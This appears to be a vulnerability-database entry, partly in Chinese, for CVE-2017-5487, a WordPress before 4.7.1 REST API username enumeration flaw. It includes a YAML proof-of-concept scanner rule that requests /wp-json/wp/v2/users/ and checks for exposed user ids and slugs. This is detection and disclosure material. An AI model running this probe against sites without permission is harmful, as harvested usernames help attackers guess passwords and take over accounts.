CVE-2017-5487: Wordpress<4.7.1 Exist Username Enumeration

2025-08-01 Wordpress PoC Public

Description

WordPress (是一种使用PHP语言开发的博客平台)WordPress 在4.7.0版本之后将REST API插件集成到默认功能之中。REST API为WordPress的使用者提供了一个方便快捷的管理接口。其中的CVE-2017-5487可以使攻击者绕过管理员权限查看wordpress上所有发布过文章的用户id与用户信息!

影响版本:

WordPress (版本号:< 4.7.1 )

PoC

id: CVE-2017-5487

info:
  name: Wordpress<4.7.1 Exist Username Enumeration
  author: G-H-Z
  severity: medium
  description: |
    WordPress (是一种使用PHP语言开发的博客平台)WordPress 在4.7.0版本之后将REST API插件集成到默认功能之中。REST API为WordPress的使用者提供了一个方便快捷的管理接口。其中的CVE-2017-5487可以使攻击者绕过管理员权限查看wordpress上所有发布过文章的用户id与用户信息!
    影响版本:
    WordPress (版本号:< 4.7.1 )
  reference:
    - http://blog.nsfocus.net/wordpress-user-enumeration-vulnerability-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
  tags: cve,cve2017,wordpress,enum
  created: 2023/07/13

rules:
  r0:
    request:
      method: GET
      path: /wp-json/wp/v2/users/
    expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b'"id":') && response.body.bcontains(b'"slug":')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities